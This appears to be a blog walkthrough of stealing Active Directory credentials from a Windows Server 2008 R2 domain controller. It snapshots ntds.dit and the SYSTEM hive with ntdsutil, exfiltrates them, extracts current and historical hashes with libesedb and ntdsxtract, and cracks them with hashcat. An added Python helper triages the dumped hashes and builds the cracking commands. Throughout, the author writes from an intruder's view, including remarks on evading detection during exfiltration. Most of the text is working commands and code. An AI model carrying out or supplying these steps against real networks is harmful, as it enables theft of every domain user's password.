credential mining a domain controller

the target system was a Windows Server 2008 R2 domain controller

the active directory database (the file ntds.dit) contains the current password hashes of every domain user, plus as many previous hashes per account as the domain's password-history policy keeps – a goldmine

========================================
taking a copy of the files
========================================
the relevant files (ntds.dit, and the SYSTEM registry hive, which holds the boot key needed to decrypt the hashes stored in ntds.dit) are held open by the OS while the DC is running, so a plain copy fails; you need a tool that snapshots them or reads around the lock

several other tools will do the job (e.g. vssadmin to create a shadow copy and copy the files out of it, NinjaCopy to read them off the raw NTFS volume, …)

i used ntdsutil because it seemed the simplest in my case

ntdsutil
activate instance ntds
ifm
create full c:\backup
quit
quit

or as a single command: ntdsutil "activate instance ntds" ifm "create full c:\backup" quit quit

the ifm (install from media) snapshot lands in c:\backup as an "Active Directory" dir holding ntds.dit and a "registry" dir holding the SYSTEM and SECURITY hives, which is the layout the extraction step below expects

========================================
installing the utils
========================================
i elected to exfiltrate the files and process them in kali

in the case of a large domain and correspondingly large files, exfiltration without detection may present its own challenges

there are alternative methods for in-situ extraction, and even a Metasploit module that performs the attack in memory on the target and streams the results back to you, but i chose this option because the domain wasn't very big and it meant that, after transferring the files, i was under no time pressure; i didn't need to worry about being kicked off while figuring stuff out

building/installing libesedb
============================
i had problems building libesedb initially, but after cycling through re-running autogen.sh/configure a few times, it just worked

if you get the error 'Missing file remove function', add '#define HAVE_UNLINK 1' to libcfile/libcfile_support.c (i experienced this error in one build, but not in another – strange!)

apt-get install git autoconf automake autopoint libtool pkg-config build-essential
git clone https://github.com/libyal/libesedb.git
cd libesedb
./synclibs.sh
./autogen.sh
./configure
make
make install
ldconfig

installing ntdsxtract
=====================
cd /opt
git clone https://github.com/csababarta/ntdsxtract.git

========================================
hash extraction
========================================
in the directory containing the exfiltrated "Active Directory" and "registry" dirs, export the tables (esedbexport writes each one into ntds.dit.export/) and then run dsusers.py over them:

esedbexport -m tables "Active Directory/ntds.dit"
python /opt/ntdsxtract/dsusers.py ntds.dit.export/datatable.3 ntds.dit.export/link_table.5 hashdumpwork \
    --syshive registry/SYSTEM \
    --lmoutfile $PWD/lm-out.txt --ntoutfile $PWD/nt-out.txt \
    --pwdformat ocl --passwordhashes --passwordhistory | tee ntdxtract.out

note that the numeric suffixes on the table files might differ: esedbexport names each exported table <name>.<N>, where N is its ESE table number, so here i'm using 'datatable.3' but it might be 'datatable.7' or whatever. same deal with link_table. list ntds.dit.export before you run dsusers.py

i had problems exporting the hashes to lm-out.txt and nt-out.txt until i fully specified the path. weird

now crack those hashes with hashcat: -m 1000 for the NT hashes in nt-out.txt, -m 3000 for any LM hashes in lm-out.txt, with --username so hashcat skips the user: prefix the ocl output carries. LM hashes fall much faster (the password is split into two case-insensitive 7-character halves), so crack those first and feed the results into the NT run as a wordlist
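below is an added example, written in Python 3 for this page rather than taken from the post or from ntdsxtract, that handles the two gotchas above (varying table suffixes, absolute output paths) and does a quick triage of the hashcat-format output before the long crack. it assumes a python2 interpreter for dsusers.py and that the ocl output is user:hash with history entries named user_history<N> (an assumption about ntdsxtract's naming); the sample dump is constructed, and the empty-password hashes and hashcat modes are the standard ones.

```python
"""Added example (not part of the post or of ntdsxtract): resolve the numbered
table files esedbexport writes, build the dsusers.py command with absolute
paths, and triage the ocl-format output before starting hashcat."""
import glob
import os
import shlex
from collections import defaultdict

# Well-known hashes of the empty password (LM and NT).
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"


def resolve_table(export_dir, prefix):
    """Absolute path of the single <prefix>.<N> file in esedbexport's output
    directory; N is the ESE table number and differs between exports."""
    matches = glob.glob(os.path.join(export_dir, prefix + ".*"))
    if len(matches) != 1:
        raise FileNotFoundError(f"expected one {prefix}.N in {export_dir}, found {matches}")
    return os.path.abspath(matches[0])


def build_dsusers_cmd(export_dir, syshive, workdir, outdir, dsusers="/opt/ntdsxtract/dsusers.py"):
    """dsusers.py invocation with every path absolute (relative --lmoutfile/--ntoutfile
    paths misbehaved in the post). Assumes a python2 interpreter: ntdsxtract is Python 2."""
    out = os.path.abspath(outdir)
    cmd = ["python2", dsusers,
           resolve_table(export_dir, "datatable"), resolve_table(export_dir, "link_table"),
           os.path.abspath(workdir), "--syshive", os.path.abspath(syshive),
           "--lmoutfile", os.path.join(out, "lm-out.txt"),
           "--ntoutfile", os.path.join(out, "nt-out.txt"),
           "--pwdformat", "ocl", "--passwordhashes", "--passwordhistory"]
    return " ".join(shlex.quote(c) for c in cmd)


def parse_ocl(lines):
    """Parse 'user:hash' lines. History entries are assumed to carry a '_history<N>'
    suffix on the user name. Returns {account: {"current": hash, "history": [hashes]}}."""
    accounts = defaultdict(lambda: {"current": None, "history": []})
    for line in lines:
        if ":" not in line:
            continue
        name, h = line.strip().rsplit(":", 1)
        base, sep, idx = name.rpartition("_history")
        if sep and idx.isdigit():
            accounts[base]["history"].append(h.lower())
        else:
            accounts[name]["current"] = h.lower()
    return dict(accounts)


def triage_nt(accounts):
    """Cheap wins before a long hashcat run: empty passwords, accounts cycling between
    old passwords (a hash repeated inside their own history), one hash on several accounts."""
    by_hash, empty, cycled = defaultdict(list), [], []
    for name, rec in accounts.items():
        cur, hist = rec["current"], rec["history"]
        if cur == EMPTY_NT:
            empty.append(name)
        elif cur:
            by_hash[cur].append(name)
        if len(hist) != len(set(hist)):
            cycled.append(name)
    shared = {h: sorted(n) for h, n in by_hash.items() if len(n) > 1}
    return {"empty": sorted(empty), "cycled": sorted(cycled), "shared": shared}


def lm_candidates(accounts):
    """Accounts with a real LM hash: the password is at most 14 chars, split into two
    case-insensitive 7-char halves, so hashcat -m 3000 recovers it fast."""
    return sorted(n for n, r in accounts.items() if r["current"] and r["current"] != EMPTY_LM)


def hashcat_commands(nt_file, lm_file, wordlist):
    """-m 3000 is LM, -m 1000 is NTLM; --username makes hashcat skip the 'user:' prefix
    of the ocl format, and --show lists what has cracked so far."""
    nt, lm, wl = (shlex.quote(p) for p in (nt_file, lm_file, wordlist))
    return [f"hashcat -m 3000 --username {lm} {wl}",
            f"hashcat -m 1000 --username {nt} {wl}",
            f"hashcat -m 1000 --username --show {nt}"]


# Constructed sample dumps in ocl format (not from a real domain).
SAMPLE_NT = """\
Administrator:8846f7eaee8fb117ad06bdd830b7586c
Administrator_history0:8846f7eaee8fb117ad06bdd830b7586c
Administrator_history1:e19ccf75ee54e06b06a5907af13cef42
Administrator_history2:8846f7eaee8fb117ad06bdd830b7586c
alice:e19ccf75ee54e06b06a5907af13cef42
bob:31d6cfe0d16ae931b73c59d7e0c089c0
svc_backup:e19ccf75ee54e06b06a5907af13cef42
""".splitlines()
SAMPLE_LM = """\
Administrator:aad3b435b51404eeaad3b435b51404ee
alice:e52cac67419a9a224a3b108f3fa6cb6d
bob:aad3b435b51404eeaad3b435b51404ee
""".splitlines()

if __name__ == "__main__":
    print(triage_nt(parse_ocl(SAMPLE_NT)), "LM present:", lm_candidates(parse_ocl(SAMPLE_LM)))
    print("\n".join(hashcat_commands("/tmp/nt-out.txt", "/tmp/lm-out.txt", "rockyou.txt")))
```

run it as-is to see the triage on the sample: bob has an empty password, Administrator cycles between two old passwords, and alice and svc_backup share one. build_dsusers_cmd only assembles the command line (it doesn't execute it), so you can eyeball the absolute paths before running it, and it refuses to guess when the export dir holds more than one datatable.N.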

references
==========
blog.joelj.org/windows-password-audit-with-kali-linux
www.cyberis.co.uk/2014/02/obtaining-ntdsdit-using-in-built.html
